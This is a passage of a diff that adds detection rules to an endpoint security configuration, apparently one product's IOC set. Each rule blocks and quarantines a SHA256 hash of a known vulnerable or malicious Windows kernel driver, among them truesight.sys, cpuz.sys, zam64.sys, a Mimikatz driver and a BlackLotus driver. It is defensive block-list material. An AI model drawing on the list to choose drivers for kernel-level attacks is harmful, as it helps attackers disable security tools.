+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472183Z",
+ "creation_date": "2026-03-23T11:45:30.472186Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472196Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be683cd38e64280567c59f7dc0a45570abcb8a75f1d894853bbbd25675b4adf7",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "48a9e746-657a-5bec-8196-f3249693a63f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611762Z",
+ "creation_date": "2026-03-23T11:45:29.611764Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611769Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz141_x64.sys) [CVE-2017-15303] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "48b6a7d1-ec7b-5400-b308-4bd76608cee3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976606Z",
+ "creation_date": "2026-03-23T11:45:29.976609Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976614Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3325f541c9930a321930853e0d7f0f4c35ba99f99a97bfe275c60248957720fb",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "48b6c077-8071-5316-bd5f-a394196bd70b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159031Z",
+ "creation_date": "2026-03-23T11:45:31.159033Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159039Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b13218595ab037f196cd60fcb63c508dfdb297dc9ec0e1503c98c889bd261e5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "48bea4f6-2d8f-59aa-83e4-651b7fb1f338",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495474Z",
+ "creation_date": "2026-03-23T11:45:31.495476Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495482Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f94cdfde51e553422161966273904386e78ec50440b3b87453dc272c96e07e3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "48bffc64-bfa0-5d18-a704-505016c9a4fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818155Z",
+ "creation_date": "2026-03-23T11:45:30.818157Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818162Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd3cf8b9af255b5d4735782d3653be38578ff5be18846b13d05867a6159aaa53",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "48c1d90d-dde3-557e-b5e2-7f6012d9b58e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147448Z",
+ "creation_date": "2026-03-23T11:45:31.147450Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147455Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "893dc1f05094678d99431e580ae49b12980f8e17faf91716b620920a2ca70f87",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "48cc104e-8ecc-58cf-9e7b-1aae6b015f13",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971470Z",
+ "creation_date": "2026-03-23T11:45:29.971472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971478Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e428ddf9afc9b2d11e2271f0a67a2d6638b860c2c12d4b8cc63d33f3349ee93f",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "48ce33ef-d4f2-5ea4-b09c-2e7aee54ed7c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978153Z",
+ "creation_date": "2026-03-23T11:45:29.978155Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978160Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8236fc01d4efaa48f032e301be2ebba4036b2cd945982a29046eca03944d2ae",
+ "comment": "Malicious Kernel Driver (aka 0x3040_blacklotus_beta_driver.sys) [https://www.loldrivers.io/drivers/8750b245-af35-4bc6-9af3-dc858f9db64f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "48d79238-e8c3-5271-a44f-d04812bc4c32",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828525Z",
+ "creation_date": "2026-03-23T11:45:30.828527Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828533Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ce8b50aafe609aa99089555ef270fd5add09356324c4dc48c4ee5f61abf6a38",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "48fd3df5-707b-5fb8-8369-ed3e8db97554",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487975Z",
+ "creation_date": "2026-03-23T11:45:31.487976Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487982Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18d5c494049fae47cc073a96d01ab43209c44641e3f09901273927fb08cc02b4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "490119f2-8d61-5531-b267-4182f549cab0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616834Z",
+ "creation_date": "2026-03-23T11:45:29.616837Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616845Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ccc32e11372896cc01d7780e1176ed6fedd17f846001bc3bf78699e4448105f",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "490b8a80-0607-58ee-b194-48f707d73dab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454848Z",
+ "creation_date": "2026-03-23T11:45:30.454851Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454860Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd4fedd5662122cbfe046a12e2137294ef1cb7822238d9e24eacc78f22f8e93d",
+ "comment": "Vulnerable Kernel Driver (aka NICM.sys) [https://www.loldrivers.io/drivers/0f8e317e-ad2b-4b02-9f96-603bb8d28604/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "490c18e2-13eb-59a5-8374-d2eb299a928c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146081Z",
+ "creation_date": "2026-03-23T11:45:32.146083Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146088Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38050334f2043b6f42fccb934b4eebc9211755a0e9ad1485740351a272696f71",
+ "comment": "Malicious Kernel Driver (aka driver_85ca0dcd.sys) [https://www.loldrivers.io/drivers/e1c29414-5b5b-44f4-84cc-e6f55d9a23c6/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4911d9dd-a781-5b78-8c6c-1a98bd1d257e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818505Z",
+ "creation_date": "2026-03-23T11:45:30.818507Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818512Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bae4372a9284db52dedc1c1100cefa758b3ec8d9d4f0e5588a8db34ded5edb1f",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4924b956-3015-5281-bb7b-fe741d987855",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830771Z",
+ "creation_date": "2026-03-23T11:45:30.830773Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830778Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3537166808a46eacd98c3b96419b586ce6b94a02b7694ade5f1333cf83069a7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "49258966-1a5c-578e-8491-061c83062006",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971016Z",
+ "creation_date": "2026-03-23T11:45:29.971020Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971028Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "931e4d6f7f04b122bc5bc6a61fb4e0186796623f4fc72d0c42ccfa886f1c5fb2",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4927940f-fae7-5a26-965e-fec21042e33a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498442Z",
+ "creation_date": "2026-03-23T11:45:31.498446Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e33fc043d24f4ec16763c65a424429fb316b0ffb668271b8f3d3edb58b164ae3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "492cd1fc-24c6-5ab0-adfd-752fa5f349f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619850Z",
+ "creation_date": "2026-03-23T11:45:29.619852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619857Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22afee6f0ec783d59ef4f5d6c189b78fa26302f0ed09670b7bbc9bae26bdb0e5",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4951b748-bc81-5db0-9931-556b1ba694d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141540Z",
+ "creation_date": "2026-03-23T11:45:31.141542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141548Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0dff65fb3b2ee96454e641f57a416159d1993c0bec3796aa96b79d9e1248f354",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4957d8c1-c589-50a6-8978-c784de79dec1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477099Z",
+ "creation_date": "2026-03-23T11:45:31.477103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477113Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee2e35139eedef641adfb4960e647d41e2f12f9fbb995404d30f69d13775fe4c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "495b8d86-bdb8-5629-bcf4-bd5266f8beba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819317Z",
+ "creation_date": "2026-03-23T11:45:31.819320Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819326Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "037cd03cf102c226c51d266f9d35a4bd8aee3e07fac0e07a25e9def9db50e101",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "496b71c8-12ed-58e3-aa03-f02ffa7f546e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832169Z",
+ "creation_date": "2026-03-23T11:45:30.832171Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832177Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
